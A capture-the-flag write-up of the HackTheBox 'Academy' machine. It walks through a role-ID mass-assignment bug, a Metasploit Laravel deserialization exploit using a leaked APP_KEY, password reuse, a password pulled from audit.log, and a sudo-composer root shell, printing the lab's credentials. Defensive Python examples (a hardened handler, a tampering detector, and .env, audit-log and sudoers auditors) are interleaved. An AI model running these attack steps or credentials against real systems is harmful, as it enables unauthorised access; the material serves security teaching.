Recon

According to the Nmap results (a full-port scan returned the same), only two ports are open, so we start with port 80.

# Nmap 7.91 scan initiated Thu Nov 12 18:50:33 2020 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.215
Nmap scan report for 10.10.10.215
Host is up (0.53s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
512/tcp filtered exec
901/tcp filtered samba-swat
1002/tcp filtered windows-icfw
1092/tcp filtered obrpd
3914/tcp filtered listcrt-port-2
6666/tcp filtered irc
7007/tcp filtered afs3-bos
7741/tcp filtered scriptview
8222/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 12 18:57:26 2020 -- 1 IP address (1 host up) scanned in 413.15 second

Foothold

Visiting by IP forces a redirect to academy.htb; after mapping the IP to that name in the hosts file and visiting the domain, we get the HTB Academy page.
The page source shows the site is written in PHP, so we start directory brute-forcing with gobuster. The results are as follows:

~/Documents/HTB/Academy 6s
cat gobuster/academy.htb-root
/images (Status: 301)
/admin.php (Status: 200)
/register.php (Status: 200)
/login.php (Status: 200)
/config.php (Status: 200)
/home.php (Status: 302)
/index.php (Status: 200)
/server-status (Status: 403)

Since registration is open, the source of register.php reveals a hidden field, roleid, that is sent with the POST. Going by the name, this field is presumably the role ID.

<input type="hidden" value="0" name="roleid" />

Sure enough, intercepting the registration request with Burp Suite shows the roleid field. Changing it to 1 gives access to /admin.php.

I'm a fucking idiot: I didn't have Burp Suite open at first and spent ages clicking around the static pages after logging in.

POST /register.php HTTP/1.1
Host: academy.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://academy.htb
DNT: 1
Connection: close
Referer: http://academy.htb/register.php
Cookie: PHPSESSID=j1lt4n4j5n7oq1vkseajg8m7rk
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

uid=htb&password=htb&confirm=htb&roleid=1

The admin page reveals a domain still under construction, dev-staging-01.academy.htb; add it to the hosts file. It also lists two users from the initial setup: "Complete initial set of modules (cry0l1t3 / mrb3n)".
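The hidden roleid field above is a textbook mass-assignment bug: the server stores whatever the client posts, so a self-registration can pick its own role. As an added example (not code from the writeup or from the box), here is a minimal Python registration handler in both the vulnerable and the hardened form, plus the detection rule a log pipeline could apply to request bodies. The User class, the role constants and the function names are hypothetical; the only request body used is the one intercepted above.

```python
from dataclasses import dataclass
from urllib.parse import parse_qs

# Hypothetical role values; only the server may ever assign ROLE_ADMIN.
ROLE_USER = 0
ROLE_ADMIN = 1

# Fields a self-service registration form is allowed to set (allowlist).
REGISTRATION_FIELDS = {"uid", "password", "confirm"}


@dataclass
class User:
    uid: str
    roleid: int
    # credential storage (hashing, salting) is omitted for brevity


def parse_form(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded body into single string values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def _check_passwords(form: dict) -> None:
    if not form.get("password") or form.get("password") != form.get("confirm"):
        raise ValueError("password missing or confirmation does not match")


def register_vulnerable(body: str) -> User:
    """Mass assignment: whatever the client posts as roleid becomes the stored role."""
    form = parse_form(body)
    _check_passwords(form)
    return User(uid=form["uid"], roleid=int(form.get("roleid", ROLE_USER)))


def register_hardened(body: str) -> User:
    """Allowlist the posted fields; the role is a server-side decision only."""
    form = parse_form(body)
    _check_passwords(form)
    unexpected = set(form) - REGISTRATION_FIELDS
    if unexpected:
        # A real handler would log this for detection; the request is still
        # served, but the extra fields never reach the user model.
        form = {k: v for k, v in form.items() if k in REGISTRATION_FIELDS}
    return User(uid=form["uid"], roleid=ROLE_USER)


def is_role_tampering(body: str) -> bool:
    """Detection rule for an access log or WAF: a self-registration carrying a non-default roleid."""
    form = parse_form(body)
    return "roleid" in form and form["roleid"] != str(ROLE_USER)


# Request body from the writeup's intercepted registration request.
WRITEUP_BODY = "uid=htb&password=htb&confirm=htb&roleid=1"

if __name__ == "__main__":
    print(register_vulnerable(WRITEUP_BODY))  # User(uid='htb', roleid=1)
    print(register_hardened(WRITEUP_BODY))    # User(uid='htb', roleid=0)
    print(is_role_tampering(WRITEUP_BODY))    # True
```

The detection rule is worth running over historical access logs as well: a registration that ever carried a roleid other than 0 is exactly the request that created an unauthorised admin.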


User.txt

On the left side of this URL, in big letters, it says:

Environment Variables
APP_NAME "Laravel"

Out of habit, a quick pass with searchsploit.

msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options 

Module options (exploit/unix/http/laravel_token_unserialize_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= no The base64 encoded APP_KEY string from the .env file
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.215 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to target webapp
VHOST dev-staging-01.academy.htb no HTTP server virtual host

Note that RHOSTS and VHOST must be set correctly, exactly as their names suggest. With that we get a shell as www-data.


User shell

After uploading and running linpeas.sh [this is where I did badly: there was a database and I didn't think to enumerate it carefully, relying too much on scripts; something to watch for next time], /var/www/html/academy contains a .env that configures the database password mySup3rP4s5w0rd!!, but logging in to the database with that password failed.

www-data@academy:/var/www/html/academy$ ls -la
total 280
drwxr-xr-x 12 www-data www-data 4096 Aug 13 12:42 .
drwxr-xr-x 4 root root 4096 Aug 13 12:36 ..
-rw-r--r-- 1 www-data www-data 706 Aug 13 12:42 .env
-rw-r--r-- 1 www-data www-data 651 Feb 7 2018 .env.example
-rw-r--r-- 1 www-data www-data 111 Feb 7 2018 .gitattributes
-rw-r--r-- 1 www-data www-data 155 Feb 7 2018 .gitignore
drwxr-xr-x 6 www-data www-data 4096 Feb 7 2018 app
-rwxr-xr-x 1 www-data www-data 1686 Feb 7 2018 artisan
drwxr-xr-x 3 www-data www-data 4096 Feb 7 2018 bootstrap
-rw-r--r-- 1 www-data www-data 1512 Feb 7 2018 composer.json
-rw-r--r-- 1 www-data www-data 191621 Aug 9 11:57 composer.lock
...
www-data@academy:/var/www/html/academy$ cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
...

Combined with the initial-setup users found earlier, logging in as cry0l1t3 with that password succeeds, and we get user.txt.
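The environment dump on the staging host and this .env readable by every local account are the same class of problem: Laravel configuration treated as non-sensitive, with a password that also turns out to be an OS login. Added example (not the project's or the writeup's code): a Python check over a .env file that flags APP_DEBUG, a non-production APP_ENV, and a file mode that exposes database credentials. The .env text is constructed with placeholder values (APP_DEBUG is set to true here to mirror the staging host that dumped its variables), and the function names are hypothetical.

```python
# Constructed .env for this example: same keys as the one found on the box,
# with the key and password replaced by placeholders and APP_DEBUG turned on
# to mirror the staging host that exposed its environment.
SAMPLE_ENV = """\
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:PLACEHOLDER_APP_KEY_NOT_REAL
APP_DEBUG=true
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=placeholder-db-password
"""

# Keys whose values must never be readable outside the application user.
SECRET_KEYS = ("APP_KEY", "DB_PASSWORD")


def parse_env(text: str) -> dict:
    """Parse KEY=VALUE lines (dotenv style); blank lines and comments are ignored."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        env[key.strip()] = value.strip().strip('"').strip("'")
    return env


def others_can_read(mode: str) -> bool:
    """True if an ls -l style mode string (e.g. -rw-r--r--) grants read to 'others'."""
    return len(mode) == 10 and mode[7] == "r"


def audit_laravel_env(text: str, mode: str = "-rw-r--r--") -> list:
    """Return the findings a hardening review would raise for this .env and its file mode."""
    env = parse_env(text)
    findings = []
    if env.get("APP_DEBUG", "").lower() == "true":
        findings.append("APP_DEBUG=true: Laravel debug pages dump request and environment data, including APP_KEY")
    if env.get("APP_ENV", "") != "production":
        findings.append(f"APP_ENV={env.get('APP_ENV', '')}: non-production configuration on a reachable host")
    present = [k for k in SECRET_KEYS if env.get(k)]
    if present and others_can_read(mode):
        findings.append(f"{mode} .env holds {', '.join(present)}: readable by every local account")
    return findings


if __name__ == "__main__":
    # The mode argument is the one shown by ls -la in the writeup (-rw-r--r--).
    for finding in audit_laravel_env(SAMPLE_ENV, mode="-rw-r--r--"):
        print(finding)
```

The mode string is passed in rather than read from disk so the check runs on a captured directory listing as well as on a live host; on a live host, pair it with a review of where else DB_PASSWORD is accepted, since reuse as an OS password is what turned a config leak into a user shell here.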

www-data@academy:/var/www/html/academy$ su - cry0l1t3
Password:
$ bash
cry0l1t3@academy:~$ ls -la
total 44
drwxr-xr-x 7 cry0l1t3 cry0l1t3 4096 Nov 12 12:20 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
lrwxrwxrwx 1 root root 9 Aug 10 23:41 .bash_history -> /dev/null
-rw-r--r-- 1 cry0l1t3 cry0l1t3 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 cry0l1t3 cry0l1t3 3771 Feb 25 2020 .bashrc
drwx------ 2 cry0l1t3 cry0l1t3 4096 Aug 12 21:58 .cache
drwx------ 4 cry0l1t3 cry0l1t3 4096 Nov 12 12:22 .gnupg
drwxrwxr-x 3 cry0l1t3 cry0l1t3 4096 Aug 12 02:30 .local
-rw-r--r-- 1 cry0l1t3 cry0l1t3 807 Feb 25 2020 .profile
drwxr-xr-x 3 cry0l1t3 cry0l1t3 4096 Nov 12 12:19 snap
drwxrwxr-x 2 cry0l1t3 cry0l1t3 4096 Nov 12 12:15 .ssh
-r--r----- 1 cry0l1t3 cry0l1t3 33 Nov 12 07:32 user.txt
cry0l1t3@academy:~$ wc -c user.txt
33 user.txt


Privilege Escalation

The first linpeas run already showed that the current user cry0l1t3 is in the adm group, so I guessed we would once again need to read the logs under /var/log/. I left that job to linpeas as well.

Sure enough, the script found mrb3n's password in /var/log/.

[+] Checking for TTY (sudo/su) passwords in logs
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
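The two lines above are TTY keystroke records: with pam_tty_audit's log_passwd option enabled, everything typed on the terminal is written to audit.log, including the password entered at the su prompt, and anyone who can read the log gets it. Added example, not from the writeup or the box: a Python parser for raw audit TTY records that flags records captured while su or sudo owned the terminal and redacts them for retention. The log lines are constructed for this example (the password in them is a placeholder, not the real one) and the helper names are hypothetical.

```python
import re

# Constructed sample records in Linux audit TTY format (what pam_tty_audit
# writes when log_passwd is enabled). The keystroke data field is hex; the
# password typed at the su prompt here is a made-up value, not the box's.
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1597199290.101:83): tty pid=2520 uid=1002 auid=1002 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.455:84): tty pid=2522 uid=1002 auid=1002 ses=1 major=4 minor=1 comm="su" data=50617373773072642D6578616D706C650A
type=SYSCALL msg=audit(1597199295.000:85): arch=c000003e syscall=59 success=yes exit=0 comm="su" exe="/usr/bin/su"
type=TTY msg=audit(1597199300.000:86): tty pid=2520 uid=1002 auid=1002 ses=1 major=4 minor=1 comm="bash" data=6C73202D6C610A
"""

TTY_RE = re.compile(
    r'^type=TTY msg=audit\((?P<ts>\d+\.\d+):(?P<serial>\d+)\): '
    r'.*?\buid=(?P<uid>\d+) .*?comm="(?P<comm>[^"]+)" data=(?P<data>[0-9A-Fa-f]+)\s*$'
)

# Programs that read a secret from the terminal: keystrokes captured while
# one of them holds the TTY are credentials, not commands.
CREDENTIAL_PROMPTERS = {"su", "sudo", "passwd", "ssh"}


def parse_tty_records(log_text: str) -> list:
    """Decode every TTY record into a dict with the keystrokes as text."""
    records = []
    for line in log_text.splitlines():
        m = TTY_RE.match(line)
        if not m:
            continue
        keys = bytes.fromhex(m["data"]).decode("utf-8", errors="replace")
        records.append({
            "serial": int(m["serial"]),
            "uid": int(m["uid"]),
            "comm": m["comm"],
            "keys": keys,
        })
    return records


def find_credential_leaks(log_text: str) -> list:
    """Report (serial, uid, comm) for records that hold a typed credential.
    The keystrokes themselves are deliberately not returned."""
    return [
        (r["serial"], r["uid"], r["comm"])
        for r in parse_tty_records(log_text)
        if r["comm"] in CREDENTIAL_PROMPTERS
    ]


def redact_credential_leaks(log_text: str) -> str:
    """Blank the data field of leak records so the log can be kept or shared safely."""
    out = []
    for line in log_text.splitlines():
        m = TTY_RE.match(line)
        if m and m["comm"] in CREDENTIAL_PROMPTERS:
            line = line[:m.start("data")] + "<redacted>"
        out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for serial, uid, comm in find_credential_leaks(SAMPLE_AUDIT_LOG):
        print(f"record {serial}: uid {uid} typed a secret into {comm}")
    print(redact_credential_leaks(SAMPLE_AUDIT_LOG))
```

Redaction is a stop-gap; the fix is to drop log_passwd from the pam_tty_audit line (so prompts that disable echo are not recorded) and to keep audit.log readable by root only, since here the adm group membership was enough to reach the password.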

After switching to that user, it turns out mrb3n can run composer via sudo; combined with the GTFOBins entry, privilege escalation is done in one go.

mrb3n@academy:/tmp$ rm -rf tmp.Q9tCu8rJFu/
mrb3n@academy:/tmp$ TF=$(mktemp -d)
mrb3n@academy:/tmp$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:/tmp$ sudo /usr/bin/composer --working-dir=$TF run-script x
PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# bash
root@academy:~# wc -c root.txt
33 root.txt
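The composer rule is dangerous because composer run-script executes whatever the composer.json in the working directory says, and the sudo rule places no restriction on the arguments, so the rule is effectively ALL. Added example (not from the writeup or the box): a small Python sudoers audit that parses user-specification lines and flags rules for such script runners, rules with unrestricted arguments, and NOPASSWD tags. The sudoers text is constructed (the mrb3n line mirrors the rule abused above), and the rule table and function names are hypothetical.

```python
import re
import shlex

# Constructed sudoers content for this example (not the box's real file).
SAMPLE_SUDOERS = """\
# User privilege specification
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
mrb3n   ALL=(ALL) /usr/bin/composer
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx
%admin  ALL=(ALL) ALL
"""

# who  hosts=(runas) [TAG:] command[, command...]
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$'
)

# Commands that execute caller-controlled scripts as the target user, so a
# sudo rule for them grants arbitrary execution. Only composer is listed
# because that is what the writeup demonstrates.
SCRIPT_RUNNERS = {
    "/usr/bin/composer": "composer run-script executes commands from a caller-supplied composer.json",
}


def parse_sudoers(text: str) -> list:
    """Parse user-specification lines into dicts; Defaults lines and comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rest = m["rest"]
        tags = []
        while (tm := re.match(r'([A-Z]+):\s*', rest)):
            tags.append(tm.group(1))
            rest = rest[tm.end():]
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        rules.append({
            "who": m["who"],
            "runas": (m["runas"] or "root").split(":")[0],
            "tags": tags,
            "commands": commands,
        })
    return rules


def audit_sudoers(text: str) -> list:
    """Return (who, command, reason) findings for rules a review should question."""
    findings = []
    for r in parse_sudoers(text):
        for cmd in r["commands"]:
            words = [cmd] if cmd == "ALL" else shlex.split(cmd)
            prog = words[0]
            if prog in SCRIPT_RUNNERS:
                findings.append((r["who"], prog, SCRIPT_RUNNERS[prog]))
            elif prog != "ALL" and len(words) == 1:
                findings.append((r["who"], prog,
                                 "no argument restriction; review which subcommands the binary exposes"))
            if "NOPASSWD" in r["tags"]:
                findings.append((r["who"], prog,
                                 "NOPASSWD: no password check if the account is compromised"))
    return findings


if __name__ == "__main__":
    for who, prog, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{who}: {prog}: {reason}")
```

The ALL rules for root and %admin are intentionally left alone: they are expected, and the point of the audit is the narrow-looking rule that is not narrow at all. For a real review, feed it `sudo -l` output or the files under /etc/sudoers.d as well as /etc/sudoers.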